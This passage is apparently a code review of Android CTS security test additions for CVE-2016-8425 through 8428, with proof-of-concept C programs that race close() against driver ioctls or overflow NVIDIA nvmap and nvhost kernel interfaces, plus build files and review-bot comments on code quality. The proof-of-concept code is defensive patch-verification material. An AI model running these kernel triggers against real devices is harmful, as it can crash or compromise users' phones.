+int main(int argc, char**argv) {
+    setup_privi_and_affinity(0, 1);
+    if (open_driver() < 0) {
+        return -1;
+    }
+    prepare_data();
+    pthread_t tid;
+    pthread_create(&tid, NULL, race_thread, NULL);
+    sleep(1);
+    while (1) {
+        if (init == 0)
+            pthread_cond_signal(&cond);
+        trigger_nvmap_create();
+    }
+    return 0;
+}
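Review bot: `prepare_data()` dereferences the `calloc` result without a NULL check and then prints `errno` after `mprotect` without looking at its return value, so the logged number can be a stale value from an earlier call and a failed `mprotect` goes unnoticed. `setup_privi_and_affinity()` has the same problem with `setpriority`. Check the return values first, e.g. `if (data == NULL) exit(EXIT_FAILURE);` and `if (mprotect(data, 0x1000, PROT_READ) != 0) printf("[*] mprotect, error = %d\n", errno);`. The `init` flag is read in `main` and written in `race_thread` with neither the mutex held nor `volatile`, and `pthread_cond_wait` is called without a predicate loop, so a signal sent before the wait begins is lost. `main` never leaves its `while (1)`, which makes `return 0` dead code and means the binary only stops when the harness kills it.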
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk
new file mode 100644
index 0000000..e984812
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8425
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c
new file mode 100644
index 0000000..498bca4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c
@@ -0,0 +1,140 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define ERR(fmt, ...)   printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM	100
+#define TRY_TIMES		900
+
+#define DEV "/dev/nvhost-vic"
+
+struct nvhost_channel_open_args {
+	__s32 channel_fd;
+};
+
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN	\
+	_IOR(NVHOST_IOCTL_MAGIC,  112, struct nvhost_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+pthread_t toggle_thread_id;
+
+static int set_affinity(int num)
+{
+	int ret = 0;
+	cpu_set_t mask;
+	CPU_ZERO(&mask);
+	CPU_SET(num, &mask);
+	ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+	if(ret == -1){
+		printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+	}
+	return ret;
+}
+
+static void prepare()
+{
+	return;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+	set_affinity(1);
+
+	while(attack){
+		usleep(200);
+		close(target_fd);
+	}
+
+	return NULL;
+}
+
+int main()
+{
+	int i, try_time = TRY_TIMES, ret;
+	struct nvhost_channel_open_args o_args = { 0 };
+
+	/* bind_cpu */
+	set_affinity(0);
+
+	/* open dev */
+	fd = open(DEV,O_RDONLY);
+	if(fd == -1){
+		ERR("[-] open failed");
+		return 0;
+	} else {
+		printf("[+] open OK\n");
+	}
+
+	#if 1
+	ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+	if(ret == -1) {
+		ERR("[-] ioctl failed");
+		goto out_dev;
+	} else {
+		printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+	}
+
+	target_fd = o_args.channel_fd;	
+	#endif
+
+	/* create close thread */
+	#if 1
+	attack = 1;
+	for(i = 0; i < CLOSE_THREAD_NUM; i++){
+		ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+		if(ret){
+			goto out_close_thread;
+		}
+	}
+	#endif
+
+	#if 1
+	for(i = 0; i < TRY_TIMES; i++){
+		/* open */
+		ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+		usleep(200);
+	}
+	#endif
+	
+out_close_thread:
+	attack = 0;
+	/* kill close thread */
+	for(i = 0; i < CLOSE_THREAD_NUM; i++){
+		if(close_thread_id[i])
+			pthread_join(close_thread_id[i], NULL);
+	}
+out_dev:
+	close(fd);
+	return 0;
+}
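Review bot: `try_time`, `prepare()`, `toggle_thread_id` and `ARRAY_SIZE` are never used in this file, and `ret` from the `ioctl` inside the `TRY_TIMES` loop is assigned but never read, so the file would emit several unused warnings once `-Wall` is in effect. The three `#if 1` / `#endif` pairs in `main` guard nothing and can be removed. This file differs from CVE-2016-8426/poc.c only in `DEV` and a few `printf` calls. Consider building both modules from one shared source with the device path passed in, e.g. `-DDEV=\"/dev/nvhost-vic\"` in the module's `LOCAL_CFLAGS`, so fixes do not have to be applied twice.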
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk
new file mode 100644
index 0000000..a134d9c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8426
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c
new file mode 100644
index 0000000..c423416
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c
@@ -0,0 +1,147 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define ERR(fmt, ...)   printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM	100
+#define TRY_TIMES		900
+
+#define DEV "/dev/nvhost-gpu"
+
+struct nvhost_channel_open_args {
+	__s32 channel_fd;
+};
+
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN	\
+	_IOR(NVHOST_IOCTL_MAGIC,  112, struct nvhost_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+pthread_t toggle_thread_id;
+
+static int set_affinity(int num)
+{
+	int ret = 0;
+	cpu_set_t mask;
+	CPU_ZERO(&mask);
+	CPU_SET(num, &mask);
+	ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+	if(ret == -1){
+		printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+	}
+	return ret;
+}
+
+static void prepare()
+{
+	return;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+	set_affinity(1);
+
+	while(attack){
+		usleep(200);
+		close(target_fd);	
+	}
+
+	return NULL;
+}
+
+int main()
+{
+	int i, try_time = TRY_TIMES, ret;
+	struct nvhost_channel_open_args o_args = { 0 };
+
+	/* bind_cpu */
+	set_affinity(0);
+
+	/* open dev */
+	fd = open(DEV,O_RDONLY);
+	if(fd == -1){
+		ERR("[-] open failed");
+		return 0;
+	} else {
+		printf("[+] open OK\n");
+	}
+
+	#if 1
+	ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+	if(ret == -1) {
+		ERR("[-] ioctl failed");
+		goto out_dev;
+	} else {
+		printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+	}
+
+	target_fd = o_args.channel_fd;	
+	#endif
+
+	/* create close thread */
+	#if 1
+	attack = 1;
+	for(i = 0; i < CLOSE_THREAD_NUM; i++){
+		ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+		if(ret){
+			printf("[+] create close thread %d failed %d %s\n", i, errno, strerror(errno));
+			goto out_close_thread;
+		}
+	}
+	#endif
+
+	#if 1
+	for(i = 0; i < TRY_TIMES; i++){
+		printf("[+] %03d times\n", i);
+		/* open */
+		ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+		if(ret == -1) {
+			ERR("[-] ioctl failed");
+		} else {
+			printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+		}
+		usleep(200);
+	}
+	#endif
+	
+out_close_thread:
+	attack = 0;
+	/* kill close thread */
+	for(i = 0; i < CLOSE_THREAD_NUM; i++){
+		if(close_thread_id[i])
+			pthread_join(close_thread_id[i], NULL);
+	}
+out_dev:
+	close(fd);
+	return 0;
+}
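Review bot: The failure message after `pthread_create` in `main` prints `errno` and `strerror(errno)`, but `pthread_create` reports its error through the return value and does not set `errno`, so the logged code is unrelated to the failure. Use the value already stored in `ret`: `printf("[-] create close thread %d failed %d %s\n", i, ret, strerror(ret));`. The line is also tagged `[+]`, while every other failure message in this file uses `[-]`.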
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk
new file mode 100644
index 0000000..131f240
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8427
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c
new file mode 100644
index 0000000..0c54420
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c
@@ -0,0 +1,94 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <linux/ion.h>
+
+#define NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL 0xc0084401ul
+
+
+int fd_gpu;
+int fd_dbg;
+int fd_dbg_1;
+
+void *thr(void *arg)
+{
+	int ioarg[2];
+	switch ((long)arg) {
+	case 0:
+		fd_dbg = open("/dev/nvhost-dbg-gpu",0x0ul,0x101000ul);
+		break;
+	case 1:
+		fd_dbg_1 = dup3(fd_dbg, fd_dbg,0x80000ul);
+		break;
+	case 2:
+		ioarg[0] = fd_dbg_1;
+		ioarg[1] = 0; 
+		ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg, 0, 0, 0);
+		break;
+	case 3:
+		fd_gpu = open("/dev/nvhost-gpu",0x0ul,0x2000ul);
+		break;
+	case 4:
+		ioarg[0] = fd_gpu;
+		ioarg[1] = 0;
+		ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg);
+		break;
+	case 5:
+		ioarg[0] = fd_gpu;
+		ioarg[1] = 0; 
+		ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg);
+		break;
+	}
+	return 0;
+}
+int poc()
+{
+	long i;
+	pthread_t th;
+	for (i = 0; i < 6; i++) {
+		pthread_create(&th, 0, thr, (void*)i);
+		usleep(10000);
+	}
+	for (i = 0; i < 6; i++) {
+		pthread_create(&th, 0, thr, (void*)i);
+		if (i%2==0)
+			usleep(10000);
+	}
+	usleep(100000);
+	return 0;
+}
+
+
+int main(int argc, char const *argv[])
+{
+	int pid;
+	while(1){
+		pid = fork();
+		if(pid){
+			usleep(30000);
+		}else
+			return poc();
+	}
+	return 0;
+}
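Review bot: `main` forks in an unbounded `while(1)` and never waits for the children, so finished children pile up as zombies for as long as the test runs, and a `fork()` result of -1 is treated as the parent branch and retried forever. Reap each child after the sleep with `waitpid(pid, NULL, 0);` (needs `<sys/wait.h>`), bound the number of iterations, and stop on `pid < 0`. In `thr`, `ioctl` is called without `<sys/ioctl.h>` being included, so it is implicitly declared, and the call in `case 2` passes three extra `0` arguments that the other calls do not. `poc()` reuses one `pthread_t th` for all twelve threads and never joins them, so the child can return while threads are still running. `<linux/ion.h>` appears to be unused.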
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk
new file mode 100644
index 0000000..21326f9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8428
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c
new file mode 100644
index 0000000..b65b16c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c
@@ -0,0 +1,213 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>  
+#include <unistd.h> 
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+	__u32 handle;		/* nvmap handle */
+	__u32 param;		/* size/align/base/heap etc. */
+	unsigned long result;	/* returns requested info*/
+};
+
+struct nvmap_create_handle {
+	union {
+		__u32 id;	/* FromId */
+		__u32 size;	/* CreateHandle */
+		__s32 fd;	/* DmaBufFd or FromFd */
+	};
+	__u32 handle;		/* returns nvmap handle */
+};
+
+struct nvmap_alloc_handle {
+	__u32 handle;		/* nvmap handle */
+	__u32 heap_mask;	/* heaps to allocate from */
+	__u32 flags;		/* wb/wc/uc/iwb etc. */
+	__u32 align;		/* min alignment necessary */
+};
+
+struct nvmap_cache_op_list {
+	__u64 handles;		/* Ptr to u32 type array, holding handles */
+	__u64 offsets;		/* Ptr to u32 type array, holding offsets
+				 * into handle mem */
+	__u64 sizes;		/* Ptr to u32 type array, holindg sizes of memory
+				 * regions within each handle */
+	__u32 nr;		/* Number of handles */
+	__s32 op;		/* wb/wb_inv/inv */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID  _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD  _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE       _IO(NVMAP_IOC_MAGIC, 4)
+#define NVMAP_IOC_ALLOC    _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_RESERVE _IOW(NVMAP_IOC_MAGIC, 18,	struct nvmap_cache_op_list)
+
+/* common carveout heaps */
+#define NVMAP_HEAP_CARVEOUT_IRAM    (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR     (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC    (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK    (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE     (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE   (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE       (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG      (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE          (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED  (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES    (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG     (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC      (0x1ul << 7)
+enum {
+	NVMAP_PAGES_UNRESERVE = 0,
+	NVMAP_PAGES_RESERVE
+};
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+struct nvmap_alloc_handle g_real_alloc = {0};
+struct nvmap_cache_op_list g_op_list = {0};
+#define MAX_HANDLE_NUM (1000)
+int g_handles_for_free[MAX_HANDLE_NUM] = {-1};
+int g_handles_for_alloc[MAX_HANDLE_NUM] = {-1};
+
+int open_driver() {
+    char* dev_path = "/dev/nvmap";
+    g_fd = open(dev_path, O_RDWR);
+    if (g_fd < 0) {
+        printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+    } else {
+        printf("[*] open file(%s) succ!\n", dev_path);
+    }
+    return g_fd;
+}
+
+int trigger_nvmap_create() {
+    g_allocation->handle = -1;
+    ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+    printf("[*] NVMAP_IOC_CREATE, last error = %d\n", errno);
+    return g_allocation->handle;
+}
+
+void trigger_nvmap_alloc(int handle) {
+    g_real_alloc.handle = handle;
+    ioctl(g_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
+    printf("[*] NVMAP_IOC_ALLOC, last error = %d\n", errno);
+}
+
+void trigger_nvmap_free(int handle) {
+    ioctl(g_fd, NVMAP_IOC_FREE, handle);
+    printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+    setpriority(PRIO_PROCESS, gettid(), privi);
+    printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+    /* bind process to a CPU*/
+    if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+        printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+    }
+}
+
+void prepare_data() {
+    int i;
+    void* data = calloc(1, 0x1000);
+    
+    g_allocation = (struct nvmap_create_handle*)data;
+    g_allocation->size = 0x40;
+    
+    g_real_alloc.align = 0x40;
+    g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+    g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+    
+    g_op_list.handles = (__u64)(&g_handles_for_alloc[0]);
+    g_op_list.offsets = (__u64)calloc(1, MAX_HANDLE_NUM * 4);
+    g_op_list.sizes = (__u64)malloc(MAX_HANDLE_NUM * 4);
+    for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+        ((int*)(g_op_list.sizes))[i] = 0xFFFF0000;
+    }
+    g_op_list.nr = MAX_HANDLE_NUM;
+    g_op_list.op = NVMAP_PAGES_RESERVE;
+}
+
+
+void create_handles() {
+    int i;
+    
+    for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+        g_handles_for_alloc[i] = trigger_nvmap_create();
+    }
+
+}
+
+
+void trigger_rw_handle(int handle) {
+    ioctl(g_fd, NVMAP_IOC_RESERVE, &g_op_list);
+    printf("[*] NVMAP_IOC_RESERVE errno = %d\n", errno);
+}
+
+int main(int argc, char**argv) {
+    int i;
+    
+    if (open_driver() < 0) {
+        return -1;
+    }
+    
+    prepare_data();
+    create_handles();
+    
+    for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+        trigger_nvmap_alloc(g_handles_for_alloc[i]);
+    }
+    
+    printf("[*] Begin to trigger bug....\n");
+    sleep(1);
+    
+    
+    for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+        trigger_rw_handle(g_handles_for_alloc[i]);
+    }
+
+    return 0;
+}
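Review bot: Each `trigger_*` helper prints `errno` unconditionally after `ioctl()` without checking the return value, so the log can show a stale error from an earlier call and a successful call can still report a non-zero "last error". Check the result and log only on failure, e.g. `if (ioctl(g_fd, NVMAP_IOC_ALLOC, &g_real_alloc) < 0) printf("[*] NVMAP_IOC_ALLOC failed, errno = %d\n", errno);`; the same applies to `setpriority()` in `setup_privi_and_affinity`. `prepare_data` also dereferences the `calloc`/`malloc` results without a NULL check. Separately, `= {-1}` on `g_handles_for_free` and `g_handles_for_alloc` sets only element 0 to -1 and the rest to 0, and `trigger_rw_handle` ignores its `handle` parameter; a short comment stating the intent would help the next reader.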
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk
new file mode 100644
index 0000000..bfe8718
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8429
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
